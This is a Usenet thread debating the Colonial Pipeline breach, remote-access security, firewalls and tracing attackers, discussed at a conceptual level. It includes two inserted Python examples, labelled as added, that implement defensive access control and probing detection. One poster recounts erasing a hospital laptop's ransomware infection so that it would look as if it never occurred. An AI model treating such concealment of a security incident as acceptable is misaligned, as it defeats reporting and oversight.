sci.electronics.design: Re: Tech audit of Colonial Pipeline found ‘glaring’ problems

Re: Tech audit of Colonial Pipeline found ‘glaring’ problems

From: blockedo...@foo.invalid (Don Y)
Newsgroups: sci.electronics.design
Date: Mon, 17 May 2021 15:16:10 -0700
Message-ID: <s7upvk$2bp$1@dont-email.me>
In-Reply-To: <86e93215-4a42-459c-a1b0-a7efe7a216den@googlegroups.com>
https://www.novabbs.com/tech/article-flat.php?id=63409&group=sci.electronics.design#63409

On 5/17/2021 2:12 PM, Ed Lee wrote:

> As long as proxies and/or original attack servers are in the US, they can
> send the FBI there. If they are from Russia, perhaps Putin would send the
> KGB there to help them.

The damage is still done. Are you going to arrest Mary Smith
because HER computer was used to shut down the centrifuges that
were processing the Uranium? You might hassle her and leave
her thinking that she should never open an email attachment
(or visit the "housewives for democracy" website). But,
you're still left with a crippled bit of infrastructure
and a "connection" that goes off to the next guy down the chain.

>> The silly part is guessing as to what was wrong and then speculating on
>> how to fix it.
>
> The wrong thing was having foreign access to mission critical computers.

The wrong thing was not having SECURE *remote* access (assuming remote
access was necessary).

You can spoof a MAC or IP address; it's not rocket science. You
can't KNOW where the connection is coming from.

You can limit maintenance activities to OUTBOUND connections
(i.e., have the kit contact a "known" computer). But, you would
have to hardwire an IP address to avoid DNS cache poisoning
effects. And, a dedicated hacker could still locate a device
"somewhere" that convinces the routers involved that *it*
is the legitimate hardwired IP address.

(you *did* note the pwn plug reference I made, earlier?
Imagine *it* was sitting on John, Head of Pipeline Operations'
computer. *It* would appear to be the legitimate target of any
maintenance transactions if it filtered traffic to John's
*real* PC)

Security is hard. Just thinking you can slap some bandaid
or "guard" on a system is blissful ignorance.

Re: Tech audit of Colonial Pipeline found ‘glaring’ problems

From: blockedo...@foo.invalid (Don Y)
Newsgroups: sci.electronics.design
Date: Mon, 17 May 2021 15:34:00 -0700
Message-ID: <s7ur13$8eh$1@dont-email.me>
In-Reply-To: <MPG.3b0cb399adffcb3d9897af@news.eternal-september.org>
https://www.novabbs.com/tech/article-flat.php?id=63410&group=sci.electronics.design#63410

On 5/17/2021 3:09 PM, Ralph Mowery wrote:
> In article <86e93215-4a42-459c-a1b0-a7efe7a216den@googlegroups.com>,
> edward.ming.lee@gmail.com says...
>>
>>> The silly part is guessing as to what was wrong and then speculating on how to fix it.
>>
>> The wrong thing was having foreign access to mission critical computers.
>
> The real wrong thing is to put anything on the internet where it can be
> accessed. While even a hard wired setup can be hacked, it would be much
> more difficult.

You can make things remotely accessible -- without having to give
away the keys to the castle!

If you want to *monitor*, then you don't need permission to CONTROL.
If you need to control, then there can be limits on the types of control
allowed as well as protocol steps that are required before they are
authorized/implemented.

Security is often just a "skin" -- a translucent one!

You don't need to know the names of the valid accounts/users on
a particular computer. All you need to know is YOUR account name
(and any appropriate credential). Being able to see other
account names leaks information that you don't NEED to see.

Being able to see the names of files -- even if you can't
access/modify their contents -- leaks information about what
they likely contain, when they were last accessed/modified,
etc.

They aren't YOUR files so you have no need to know ANYTHING
about them! Even whether or not they *exist*!

I'm always amazed at how often "personal data" is hacked/leaked.
I can understand needing on-line access to my account balances
to verify I can pay a particular bill. But, you don't need
access to my phone number, date of birth, residence, mother's
maiden name, etc. TO CHECK MY BALANCE.

And, you don't need to know EXACTLY what it is!

"Can he afford $239.45? -- yes or no!"

[If you then start asking about other amounts (in an attempt
to narrow down the actual amount by successive guessing),
then your connection could be flagged as 'suspicious']
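
The separation Don Y argues for above (monitoring without the power to control, an explicit bound on which controls a session may issue, a protocol step that must precede any change, and no disclosure of what exists beyond one's own allow-list) as an added Python example. This is not code from the thread or from any real pipeline system; the roles, parameter names, setpoint bounds and the 30-second confirmation window are assumptions made for the illustration.

```python
"""Added example, not from the thread: a remote-access policy layer that
separates MONITOR from CONTROL, bounds the controls a role may issue, and
requires a request/confirm protocol step before a change is applied.
Roles, parameter names, limits and the confirmation window are assumptions."""
from dataclasses import dataclass, field
import secrets
import time

# Constructed policy: each role carries an explicit allow-list. "monitor"
# can only read; "operator" may also move one setpoint inside a bounded range.
ROLE_POLICY = {
    "monitor": {"read": {"pressure", "flow", "valve_state"}, "control": {}},
    "operator": {
        "read": {"pressure", "flow", "valve_state"},
        "control": {"pump_setpoint_pct": (0, 80)},  # hypothetical bounds, percent
    },
}


class PolicyError(Exception):
    """Raised for any denied action. The message never reveals whether the
    requested name exists; the caller only learns it is not theirs to touch."""


@dataclass
class Session:
    user: str
    role: str
    # pending control requests awaiting confirmation: token -> (name, value, issued_at)
    pending: dict = field(default_factory=dict)


class Gateway:
    CONFIRM_WINDOW_S = 30  # assumed: a request must be confirmed within 30 s

    def __init__(self):
        # Constructed plant state standing in for the real controller.
        self.state = {"pressure": 412.0, "flow": 1180.0, "valve_state": "open",
                      "pump_setpoint_pct": 65}
        self.audit = []  # (user, name, value) for every applied change

    def read(self, session, name):
        # Same generic refusal whether the name is unknown or merely not allowed.
        if name not in ROLE_POLICY[session.role]["read"]:
            raise PolicyError("read not permitted")
        return self.state[name]

    def request_control(self, session, name, value, now=None):
        """Step 1 of the control protocol: check the allow-list and the bounds,
        then hand back a one-time token. Nothing changes yet."""
        limits = ROLE_POLICY[session.role]["control"].get(name)
        if limits is None:
            raise PolicyError("control not permitted")
        lo, hi = limits
        if not lo <= value <= hi:
            raise PolicyError(f"value outside permitted range {lo}..{hi}")
        token = secrets.token_hex(8)
        session.pending[token] = (name, value, time.time() if now is None else now)
        return token

    def confirm_control(self, session, token, now=None):
        """Step 2: the same session must present the token, unexpired and
        unused, before the change is applied and written to the audit log."""
        entry = session.pending.pop(token, None)
        if entry is None:
            raise PolicyError("unknown or already-used confirmation token")
        name, value, issued = entry
        now = time.time() if now is None else now
        if now - issued > self.CONFIRM_WINDOW_S:
            raise PolicyError("confirmation window expired; request again")
        self.state[name] = value
        self.audit.append((session.user, name, value))
        return value


if __name__ == "__main__":
    gw = Gateway()
    operator = Session("bob", "operator")
    token = gw.request_control(operator, "pump_setpoint_pct", 50, now=0)
    print("applied:", gw.confirm_control(operator, token, now=5), gw.audit)
```

The point of the two-step shape is that a single stray or replayed message cannot change the plant: the token is bound to the session that requested it, is consumed on first use, and expires. Reads and controls are denied with the same wording so that a monitor-only session cannot enumerate which parameters exist.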

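The balance-check idea in the post above (answer "can he afford $239.45?" with a yes or a no only, and flag a connection that tries to narrow the real amount down by successive guessing) as an added Python example. It is not code from the thread; the account data, client names and the detection thresholds are constructed for the illustration.

```python
"""Added example, not from the thread: a yes/no affordability oracle that
never returns the balance, with a detector for a client whose sequence of
amounts narrows in on the true value by successive guessing.
Balances, client names and thresholds are constructed for the example."""
from collections import defaultdict, deque

# Constructed account data; the oracle never discloses these values.
BALANCES = {"acct-1001": 1234.56}


class ProbingDetected(Exception):
    """Raised once a client has been flagged; further answers are refused."""


class AffordabilityOracle:
    WINDOW = 20          # assumed: look at the client's last 20 queries
    MAX_QUERIES = 12     # assumed: more answers than this in the window is abusive
    MIN_CONVERGING = 5   # assumed: this many interval-narrowing queries is a search

    def __init__(self):
        self.history = defaultdict(lambda: deque(maxlen=self.WINDOW))
        self.flagged = set()

    def can_afford(self, client, acct, amount):
        """Answer only whether the balance covers `amount`; never the balance."""
        if client in self.flagged:
            raise ProbingDetected(f"{client} is flagged; answer refused")
        answer = BALANCES[acct] >= amount
        hist = self.history[client]
        hist.append((amount, answer))
        if len(hist) > self.MAX_QUERIES or self._looks_like_bisection(hist):
            self.flagged.add(client)
        return answer

    @staticmethod
    def _looks_like_bisection(hist):
        """After a 'yes' at A and a 'no' at B, the true balance lies in (A, B).
        Count the queries that land strictly inside the interval known from the
        queries before them: a successive-approximation search does this every
        time, while an honest caller checking unrelated bills rarely does."""
        lo, hi = None, None          # largest 'yes' and smallest 'no' so far
        converging = 0
        for amount, answer in hist:
            if lo is not None and hi is not None and lo < amount < hi:
                converging += 1
            if answer:
                lo = amount if lo is None else max(lo, amount)
            else:
                hi = amount if hi is None else min(hi, amount)
        return converging >= AffordabilityOracle.MIN_CONVERGING


if __name__ == "__main__":
    oracle = AffordabilityOracle()
    print("shop-A, $239.45:", oracle.can_afford("shop-A", "acct-1001", 239.45))
    print("flagged so far:", oracle.flagged)
```

The detector keys on the shape of the query sequence rather than on volume alone: a merchant that checks a handful of unrelated bills produces amounts scattered on both sides of the boundary, while a search keeps landing inside the interval its own earlier answers established. The raw per-window cap is a second, coarser guard for clients that probe without bisecting.
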
Re: Tech audit of Colonial Pipeline found ‘glaring’ problems

From: gnuarm.d...@gmail.com (Rick C)
Newsgroups: sci.electronics.design
Date: Mon, 17 May 2021 16:12:48 -0700 (PDT)
Message-ID: <58d3a997-1b4d-4d1a-8e6c-6663b1bd8408n@googlegroups.com>
In-Reply-To: <s7upvk$2bp$1@dont-email.me>
https://www.novabbs.com/tech/article-flat.php?id=63411&group=sci.electronics.design#63411

On Monday, May 17, 2021 at 6:16:25 PM UTC-4, Don Y wrote:
> On 5/17/2021 2:12 PM, Ed Lee wrote:
>
> > As long as proxies and/or original attack servers are in the US, they can
> > send the FBI there. If they are from Russia, perhaps Putin would send the
> > KGB there to help them.
> The damage is still done. Are you going to arrest Mary Smith
> because HER computer was used to shut down the centrifuges that
> were processing the Uranium?

No, but you can hassle her because someone used her open wifi to download copyrighted materials.

I actually got booted from my ISP once because of a Xilinx app note I had in the wrong directory which made it accessible from file sharing software. Technically it is copyrighted and so I was out! I'm not sure I even read the thing. I saw it among the many files in random places in file sharing software and thought I should snag it rather than hunt for it on the Xilinx web site. I forgot to remove it from the file sharing software's view after I had it and that was the file they decided to nit pick over.

--

Rick C.

+-- Get 1,000 miles of free Supercharging
+-- Tesla referral code - https://ts.la/richard11209

Re: Tech audit of Colonial Pipeline found ‘glaring’ problems

From: edward.m...@gmail.com (Ed Lee)
Newsgroups: sci.electronics.design
Date: Mon, 17 May 2021 16:15:57 -0700 (PDT)
Message-ID: <013c6a99-3dab-4650-8945-8485943a2283n@googlegroups.com>
In-Reply-To: <s7upvk$2bp$1@dont-email.me>
https://www.novabbs.com/tech/article-flat.php?id=63412&group=sci.electronics.design#63412

On Monday, May 17, 2021 at 3:16:25 PM UTC-7, Don Y wrote:
> On 5/17/2021 2:12 PM, Ed Lee wrote:
>
> > As long as proxies and/or original attack servers are in the US, they can
> > send the FBI there. If they are from Russia, perhaps Putin would send the
> > KGB there to help them.
> The damage is still done. Are you going to arrest Mary Smith
> because HER computer was used to shut down the centrifuges that
> were processing the Uranium? You might hassle her and leave
> her thinking that she should never open an email attachment
> (or visit the "housewives for democracy" website). But,
> you're still left with a crippled bit of infrastructure
> and a "connection" that goes off to the next guy down the chain.

They can confiscate Mary's PC and start tracking down the next guy Tom.

> >> The silly part is guessing as to what was wrong and then speculating on
> >> how to fix it.
> >
> > The wrong thing was having foreign access to mission critical computers.
> The wrong thing was not having SECURE *remote* access (assuming remote
> access was necessary).
>
> You can spoof a MAC or IP address; it's not rocket science. You
> can't KNOW where the connection is coming from.

You have to spoof an IP address within range of your ISP. If it's a local ISP, it can be traced.

> You can limit maintenance activities to OUTBOUND connections
> (i.e., have the kit contact a "known" computer). But, would
> have to hardwire an IP address to avoid DNS cache poisoning
> effects. And, a dedicated hacker could still locate a device
> "somewhere" that convinces the routers involved that *it*
> is the legitimate hardwired IP address.
>
> (you *did* note the pwn plug reference I made, earlier?
> Imagine *it* was sitting on John, Head of Pipeline Operations'
> computer. *It* would appear to be the legitimate target of any
> maintenance transactions if it filtered traffic to John's
> *real* PC)

Port scanning, intrusion and proxy take days. The authority would have time to shut down John's PC, if it's in the US.
> Security is hard. Just thinking you can slap some bandaid
> or "guard" on a system is blissful ignorance.

That doesn't mean we just let it wide open, without blocking anything.

Re: Tech audit of Colonial Pipeline found ‘glaring’ problems

From: blockedo...@foo.invalid (Don Y)
Newsgroups: sci.electronics.design
Date: Mon, 17 May 2021 16:28:40 -0700
Message-ID: <s7uu7j$alu$1@dont-email.me>
In-Reply-To: <013c6a99-3dab-4650-8945-8485943a2283n@googlegroups.com>
https://www.novabbs.com/tech/article-flat.php?id=63413&group=sci.electronics.design#63413

On 5/17/2021 4:15 PM, Ed Lee wrote:
> On Monday, May 17, 2021 at 3:16:25 PM UTC-7, Don Y wrote:
>> On 5/17/2021 2:12 PM, Ed Lee wrote:
>>
>>> As long as proxies and/or original attack servers are in the US, they can
>>> send the FBI there. If they are from Russia, perhaps Putin would send the
>>> KGB there to help them.
>> The damage is still done. Are you going to arrest Mary Smith
>> because HER computer was used to shut down the centrifuges that
>> were processing the Uranium? You might hassle her and leave
>> her thinking that she should never open an email attachment
>> (or visit the "housewives for democracy" website). But,
>> you're still left with a crippled bit of infrastructure
>> and a "connection" that goes off to the next guy down the chain.
>
> They can confiscate Mary's PC and start tracking down the next guy Tom.

And the guy after that.... until they find themselves in a jurisdiction
where they have no leverage.

Meanwhile, the pipeline is still down!

>>>> The silly part is guessing as to what was wrong and then speculating on
>>>> how to fix it.
>>>
>>> The wrong thing was having foreign access to mission critical computers.
>> The wrong thing was not having SECURE *remote* access (assuming remote
>> access was necessary).
>>
>> You can spoof a MAC or IP address; it's not rocket science. You
>> can't KNOW where the connection is coming from.
>
> You have to spoof an IP address within range of your ISP. If it's a local ISP, it can be traced.

You're obsessed with being able to catch the perp.
How many crimes do you think go "unpunished"? Do you
think you'll have a better batting average with these?

Ask yourself how many happen every day that go unreported
(to the authorities OR the public). Lots of perps running
around, free to ply their wares on the next mark!

>> You can limit maintenance activities to OUTBOUND connections
>> (i.e., have the kit contact a "known" computer). But, would
>> have to hardwire an IP address to avoid DNS cache poisoning
>> effects. And, a dedicated hacker could still locate a device
>> "somewhere" that convinces the routers involved that *it*
>> is the legitimate hardwired IP address.
>>
>> (you *did* note the pwn plug reference I made, earlier?
>> Imagine *it* was sitting on John, Head of Pipeline Operations'
>> computer. *It* would appear to be the legitimate target of any
>> maintenance transactions if it filtered traffic to John's
>> *real* PC)
>
> Port scanning, intrusion and proxy take days. The authority would have
> time to shut down John's PC, if it's in the US.

You're assuming they KNOW it's John's PC -- in short order.

And, you're assuming that there is only one attack vector.

You just keep painting yourself into a smaller corner
each time you HOPE some of these tactics yields results.

I guess the FBI and NSA should be hiring YOU -- as you seem
to have all the answers! (they must just be a bunch of
stupid bureaucrats, eh?)

You consistently seem to downplay risk -- in your code, in your
analysis of security issues, etc. That's a bad attitude for
any developer!

"Don't worry, the condom won't break..."

>> Security is hard. Just thinking you can slap some bandaid
>> or "guard" on a system is blissful ignorance.
>
> That doesn't mean we just let it wide open, without blocking anything.

Blocking is only effective if it *is* effective.
If someone can subvert ANY protection mechanism,
then the protection mechanism represents an expenditure
of YOUR effort -- but with no *actual* results!

Re: Tech audit of Colonial Pipeline found ‘glaring’ problems

From: edward.m...@gmail.com (Ed Lee)
Newsgroups: sci.electronics.design
Date: Mon, 17 May 2021 16:39:23 -0700 (PDT)
Message-ID: <b04a1b36-f089-4bb2-836f-5aced79d795en@googlegroups.com>
In-Reply-To: <s7uu7j$alu$1@dont-email.me>
https://www.novabbs.com/tech/article-flat.php?id=63414&group=sci.electronics.design#63414

On Monday, May 17, 2021 at 4:29:00 PM UTC-7, Don Y wrote:
> On 5/17/2021 4:15 PM, Ed Lee wrote:
> > On Monday, May 17, 2021 at 3:16:25 PM UTC-7, Don Y wrote:
> >> On 5/17/2021 2:12 PM, Ed Lee wrote:
> >>
> >>> As long as proxies and/or original attack servers are in the US, they can
> >>> send the FBI there. If they are from Russia, perhaps Putin would send the
> >>> KGB there to help them.
> >> The damage is still done. Are you going to arrest Mary Smith
> >> because HER computer was used to shut down the centrifuges that
> >> were processing the Uranium? You might hassle her and leave
> >> her thinking that she should never open an email attachment
> >> (or visit the "housewives for democracy" website). But,
> >> you're still left with a crippled bit of infrastructure
> >> and a "connection" that goes off to the next guy down the chain.
> >
> > They can confiscate Mary's PC and start tracking down the next guy Tom.
> And the guy after that.... until they find themselves in a jurisdiction
> where they have no leverage.

Confiscating Mary's PC broke the chain. Whether they catch Tom or not, there is no more damage.

> Meanwhile, the pipeline is still down!
> >>>> The silly part is guessing as to what was wrong and then speculating on
> >>>> how to fix it.
> >>>
> >>> The wrong thing was having foreign access to mission critical computers.
> >> The wrong thing was not having SECURE *remote* access (assuming remote
> >> access was necessary).
> >>
> >> You can spoof a MAC or IP address; it's not rocket science. You
> >> can't KNOW where the connection is coming from.
> >
> > You have to spoof an IP address within range of your ISP. If it's a local ISP, it can be traced.
> You're obsessed with being able to catch the perp.
> How many crimes do you think go "unpunished"? Do you
> think you'll have a better batting average with these?

Only the serious crime. Hacking the pipeline qualified as such.

> Ask yourself how many happen every day that go unreported
> (to the authorities OR the public). Lots of perps running
> around, free to ply their wares on the next mark!
> >> You can limit maintenance activities to OUTBOUND connections
> >> (i.e., have the kit contact a "known" computer). But, would
> >> have to hardwire an IP address to avoid DNS cache poisoning
> >> effects. And, a dedicated hacker could still locate a device
> >> "somewhere" that convinces the routers involved that *it*
> >> is the legitimate hardwired IP address.
> >>
> >> (you *did* note the pwn plug reference I made, earlier?
> >> Imagine *it* was sitting on John, Head of Pipeline Operations'
> >> computer. *It* would appear to be the legitimate target of any
> >> maintenance transactions if it filtered traffic to John's
> >> *real* PC)
> >
> > Port scanning, intrusion and proxy take days. The authority would have
> > time to shut down John's PC, if it's in the US.
> You're assuming they KNOW it's John's PC -- in short order.
>
> And, you're assuming that there is only one attack vector.
>
> You just keep painting yourself into a smaller corner
> each time you HOPE some of these tactics yields results.
>
> I guess the FBI and NSA should be hiring YOU -- as you seem
> to have all the answers! (they must just be a bunch of
> stupid bureaucrats, eh?)

No, but I did work for another agency on this.

> You consistently seem to downplay risk -- in your code, in your
> analysis of security issues, etc. That's a bad attitude for
> any developer!
>
> "Don't worry, the condom won't break..."
> >> Security is hard. Just thinking you can slap some bandaid
> >> or "guard" on a system is blissful ignorance.
> >
> > That doesn't mean we just let it wide open, without blocking anything.
> Blocking is only effective if it *is* effective.
> If someone can subvert ANY protection mechanism,
> then the protection mechanism represents an expenditure
> of YOUR effort -- but with no *actual* results!

It is effective. Most entities are just not putting enough effort in firewalling, until it's too late.

Re: Tech audit of Colonial Pipeline found ‘glaring’ problems

https://www.novabbs.com/tech/article-flat.php?id=63415&group=sci.electronics.design#63415
From: prese...@MUNGEpanix.com (Cydrome Leader)
Newsgroups: sci.electronics.design
Subject: Re: Tech audit of Colonial Pipeline found ‘glaring’ problems
Date: Mon, 17 May 2021 23:44:29 +0000 (UTC)
Organization: PANIX Public Access Internet and UNIX, NYC
Lines: 19
Message-ID: <s7uv4t$fq$1@reader1.panix.com>
 by: Cydrome Leader - Mon, 17 May 2021 23:44 UTC

DecadentLinuxUserNumeroUno@decadence.org wrote:
> Cydrome Leader <presence@MUNGEpanix.com> wrote in
> news:s7s6r2$9qe$1@reader1.panix.com:
>
>> We had a problem at work where an alarm system was dialing people
>> with vague pre-recorded messages about temperature or pressure
>> alarms on HVAC equipment. Nobody could figure out where the device
>> was or how to stop it. The messages and phone numbers were entered
>> by a long gone employee.
>
> Old temperature controlled computer rooms used to dial out if certain
> thresholds were breeched. Usually requiring that a tech wake up and
> get out there to assess the situation.

There was other nonsense like too many AC units, so they'd fight over
temperatures and short cycle then shut down. There was some mysterious art
to setting the thermostats. Air handler belts would sometimes slip and
blow black dust all over the place. A gross layer of soot would cover all
equipment. It was a mess.

Re: Tech audit of Colonial Pipeline found ‘glaring’ problems

https://www.novabbs.com/tech/article-flat.php?id=63416&group=sci.electronics.design#63416
From: blockedo...@foo.invalid (Don Y)
Newsgroups: sci.electronics.design
Subject: Re: Tech audit of Colonial Pipeline found ‘glaring’ problems
Date: Mon, 17 May 2021 17:01:41 -0700
Organization: A noiseless patient Spider
Lines: 178
Message-ID: <s7v05i$c9r$1@dont-email.me>
 by: Don Y - Tue, 18 May 2021 00:01 UTC

On 5/17/2021 4:39 PM, Ed Lee wrote:
> On Monday, May 17, 2021 at 4:29:00 PM UTC-7, Don Y wrote:
>> On 5/17/2021 4:15 PM, Ed Lee wrote:
>>> On Monday, May 17, 2021 at 3:16:25 PM UTC-7, Don Y wrote:
>>>> On 5/17/2021 2:12 PM, Ed Lee wrote:
>>>>
>>>>> As long as proxies and/or original attack servers are in the US, they can
>>>>> send the FBI there. If they are from Russia, perhaps Putin would send the
>>>>> KGB there to help them.
>>>> The damage is still done. Are you going to arrest Mary Smith
>>>> because HER computer was used to shut down the centrifuges that
>>>> were processing the Uranium? You might hassle her and leave
>>>> her thinking that she should never open an email attachment
>>>> (or visit the "housewives for democracy" website). But,
>>>> you're still left with a crippled bit of infrastructure
>>>> and a "connection" that goes off to the next guy down the chain.
>>>
>>> They can confiscate Mary's PC and start tracking down the next guy Tom.
>> And the guy after that.... until they find themselves in a jurisdiction
>> where they have no leverage.
>
> Confiscating Mary's PC broke the chain. Whether they catch Tom or not, there is no more damage.

No, it didn't. Betty's computer is ready to step in and assume
the role -- the pipeline is under the hacker's control so THEY
decide how that control is implemented. All you can do is
cut your connection to the outside world. In which case,
the hackers have achieved their goal and can wait for you
to try to bring things back on-line.

You keep assuming that there are "rules" that are followed.
There aren't. That's why the breach is possible (had the
attacker followed the rules, they wouldn't have gained access!)

>> Meanwhile, the pipeline is still down!
>>>>>> The silly part is guessing as to what was wrong and then speculating on
>>>>>> how to fix it.
>>>>>
>>>>> The wrong thing was having foreign access to mission critical computers.
>>>> The wrong thing was not having SECURE *remote* access (assuming remote
>>>> access was necessary).
>>>>
>>>> You can spoof a MAC or IP address; it's not rocket science. You
>>>> can't KNOW where the connection is coming from.
>>>
>>> You have to spoof an IP address within range of your ISP. If it's a local ISP, it can be traced.
>> You're obsessed with being able to catch the perp.
>> How many crimes do you think go "unpunished"? Do you
>> think you'll have a better batting average with these?
>
> Only the serious crime. Hacking the pipeline qualified as such.

So, hacking the government's personnel files isn't?
Hacking banks? Major corporations? Where do you draw
the line? Is it based on number of persons affected?
Dollars at stake? "Pride" issues?

And, once you set a threshold, you effectively tell the hackers:
"You are free to go after anything below this level with impunity;
we don't have the resources nor desire to track you down."

I'm sure THAT sort of policy will be a big hit with the folks
who fail to rise above that threshold!

>> Ask yourself how many happen every day that go unreported
>> (to the authorities OR the public). Lots of perps running
>> around, free to ply their wares on the next mark!
>>>> You can limit maintenance activities to OUTBOUND connections
>>>> (i.e., have the kit contact a "known" computer). But, would
>>>> have to hardwire an IP address to avoid DNS cache poisoning
>>>> effects. And, a dedicated hacker could still locate a device
>>>> "somewhere" that convinces the routers involved that *it*
>>>> is the legitimate hardwired IP address.
>>>>
>>>> (you *did* note the pwn plug reference I made, earlier?
>>>> Imagine *it* was sitting on John, Head of Pipeline Operations'
>>>> computer. *It* would appear to be the legitimate target of any
>>>> maintenance transactions if it filtered traffic to John's
>>>> *real* PC)
>>>
>>> Port scanning, intrusion and proxy take days. The authority would have
>>> time to shutdown John's PC, if it's in the US.
>> You're assuming they KNOW it's John's PC -- in short order.
>>
>> And, you're assuming that there is only one attack vector.
>>
>> You just keep painting yourself into a smaller corner
>> each time you HOPE some of these tactics yield results.
>>
>> I guess the FBI and NSA should be hiring YOU -- as you seem
>> to have all the answers! (they must just be a bunch of
>> stupid bureaucrats, eh?)
>
> No, but I did work for another agency on this.

And they've had no successful penetrations? Are they using
YOUR naive recommendations? Have their adversaries failed
to learn and adapt their processes after you left?

[You should recommend them to the FBI and NSA to take on
*their* responsibilities!]

Imagine how many breaches happen every day that are hushed up
(because the parties don't want the public to lose faith in them)
and unreported. Wanna bet your local hospital has been victimized?
Do you recall hearing about it on the local news??

A friend was the safety officer at one of the local hospitals.
I got a panicked call, one night, because someone had used
his laptop and it was now locked-pending-ransomware. He
had nothing of value on the laptop -- but, his reputation (job!)
was at stake (despite the fact that HE wasn't the one who
had caused the infection) in that he'd allowed the laptop to
leave his *personal* control. My job, clean off the laptop
and make it look like the infection had never occurred.

(which meant also scanning other media he had in his possession)

>> You consistently seem to downplay risk -- in your code, in your
>> analysis of security issues, etc. That's a bad attitude for
>> any developer!
>>
>> "Don't worry, the condom won't break..."
>>>> Security is hard. Just thinking you can slap some bandaid
>>>> or "guard" on a system is blissful ignorance.
>>>
>>> That doesn't mean we just let it wide open, without blocking anything.
>> Blocking is only effective if it *is* effective.
>> If someone can subvert ANY protection mechanism,
>> then the protection mechanism represents an expenditure
>> of YOUR effort -- but with no *actual* results!
>
> It is effective. Most entities are just not putting enough effort in firewalling, until it's too late.

Firewalls, by themselves, are largely useless. It's like putting
two locks on your front door -- and forgetting that you also
have windows and skylights, invite workmen into your home, etc.

Did you remove all of the floppy disks, USB ports, CD/DVD drives
and other mechanisms that can be used to *locally* inject software
into a machine INSIDE the firewalled domain?

Have you put filters on all of your incoming mail traffic and WWW responses?

Are you sure nothing is tunneling through your firewall on some
benign but ubiquitous protocol (like DNS)?

Do you have a penetration testing system in place and on-line?

Do you have staff who can think of how zero-day exploits can subvert
their best practices (or, are they just trained monkeys implementing
policy decided elsewhere)?

I had an "aunt" (more likely a third cousin) who was very proud
of her furs and jewelry. One day, she came home to find the
side door of her house completely torn from its frame -- and
the "goodies" missing. No need to bother with breaking a window,
just pull the truck up to the door and remove it from the frame!

I worked on the design of "island terminals" -- essentially
self-serve payment centers. These were intended to be left,
unattended, in places like gas stations. The electronics
were small -- about the size of a notebook. The *case*
into which it was installed was bigger than a phone booth
(broad base to anchor to the concrete beneath) and made
of 1/4-inch-thick steel. Definitely not necessary for a little
bit of electronics -- but, essential if you want to thwart someone
smashing into it with a vehicle in an attempt to access its
contents!

If you've ever tried to hack one of AT&T's "fortress" phones,
you'll discover that the only effective hack is to physically
remove it from the booth and cart it off to another location;
you won't be able to get access to its coinbox in the time
it will take for them to notice the attempt!

Spend some time on a red team to realize how foolish the protections
actually are!


Re: Tech audit of Colonial Pipeline found ‘glaring’ problems

https://www.novabbs.com/tech/article-flat.php?id=63417&group=sci.electronics.design#63417
Newsgroups: sci.electronics.design
Date: Mon, 17 May 2021 17:22:24 -0700 (PDT)
Message-ID: <e8eff4a9-92c5-4a0c-8b0c-0b80ad4f775fn@googlegroups.com>
Subject: Re: Tech audit of Colonial Pipeline found ‘glaring’ problems
From: edward.m...@gmail.com (Ed Lee)
 by: Ed Lee - Tue, 18 May 2021 00:22 UTC

On Monday, May 17, 2021 at 5:02:00 PM UTC-7, Don Y wrote:
> On 5/17/2021 4:39 PM, Ed Lee wrote:
> > On Monday, May 17, 2021 at 4:29:00 PM UTC-7, Don Y wrote:
> >> On 5/17/2021 4:15 PM, Ed Lee wrote:
> >>> On Monday, May 17, 2021 at 3:16:25 PM UTC-7, Don Y wrote:
> >>>> On 5/17/2021 2:12 PM, Ed Lee wrote:
> >>>>
> >>>>> As long as proxies and/or original attack servers are in the US, they can
> >>>>> send the FBI there. If they are from Russia, perhaps Putin would send the
> >>>>> KGB there to help them.
> >>>> The damage is still done. Are you going to arrest Mary Smith
> >>>> because HER computer was used to shut down the centrifuges that
> >>>> were processing the Uranium? You might hassle her and leave
> >>>> her thinking that she should never open an email attachment
> >>>> (or visit the "housewives for democracy" website). But,
> >>>> you're still left with a crippled bit of infrastructure
> >>>> and a "connection" that goes off to the next guy down the chain.
> >>>
> >>> They can confiscate Mary's PC and start tracking down the next guy Tom.
> >> And the guy after that.... until they find themselves in a jurisdiction
> >> where they have no leverage.
> >
> > Confiscating Mary's PC broke the chain. Whether they catch Tom or not, there is no more damage.
> No, it didn't. Betty's computer is ready to step in and assume
> the role -- the pipeline is under the hacker's control so THEY
> decide how that control is implemented. All you can do is
> cut your connection to the outside world. In which case,
> the hackers have achieved their goal and can wait for you
> to try to bring things back on-line.

The important point is blocking access with firewall before they get access through Mary, Betty and Tom.

> You keep assuming that there are "rules" that are followed.
> There aren't. That's why the breach is possible (had the
> attacker followed the rules, they wouldn't have gained access!)
> >> Meanwhile, the pipeline is still down!
> >>>>>> The silly part is guessing as to what was wrong and then speculating on
> >>>>>> how to fix it.
> >>>>>
> >>>>> The wrong thing was having foreign access to mission critical computers.
> >>>> The wrong thing was not having SECURE *remote* access (assuming remote
> >>>> access was necessary).
> >>>>
> >>>> You can spoof a MAC or IP address; it's not rocket science. You
> >>>> can't KNOW where the connection is coming from.
> >>>
> >>> You have to spoof an IP address within range of your ISP. If it's a local ISP, it can be traced.
> >> You're obsessed with being able to catch the perp.
> >> How many crimes do you think go "unpunished"? Do you
> >> think you'll have a better batting average with these?
> >
> > Only the serious crime. Hacking the pipeline qualified as such.
> So, hacking the government's personnel files isn't?
> Hacking banks? Major corporations? Where do you draw
> the line? Is it based on number of persons affected?
> Dollars at stake? "Pride" issues?
>
> And, once you set a threshold, you effectively tell the hackers:
> "You are free to go after anything below this level with impunity;
> we don't have the resources nor desire to track you down."
>
> I'm sure THAT sort of policy will be a big hit with the folks
> who fail to rise above that threshold!
> >> Ask yourself how many happen every day that go unreported
> >> (to the authorities OR the public). Lots of perps running
> >> around, free to ply their wares on the next mark!
> >>>> You can limit maintenance activities to OUTBOUND connections
> >>>> (i.e., have the kit contact a "known" computer). But, would
> >>>> have to hardwire an IP address to avoid DNS cache poisoning
> >>>> effects. And, a dedicated hacker could still locate a device
> >>>> "somewhere" that convinces the routers involved that *it*
> >>>> is the legitimate hardwired IP address.
> >>>>
> >>>> (you *did* note the pwn plug reference I made, earlier?
> >>>> Imagine *it* was sitting on John, Head of Pipeline Operations'
> >>>> computer. *It* would appear to be the legitimate target of any
> >>>> maintenance transactions if it filtered traffic to John's
> >>>> *real* PC)
> >>>
> >>> Port scanning, intrusion and proxy take days. The authority would have
> >>> time to shutdown John's PC, if it's in the US.
> >> You're assuming they KNOW it's John's PC -- in short order.
> >>
> >> And, you're assuming that there is only one attack vector.
> >>
> >> You just keep painting yourself into a smaller corner
> >> each time you HOPE some of these tactics yield results.
> >>
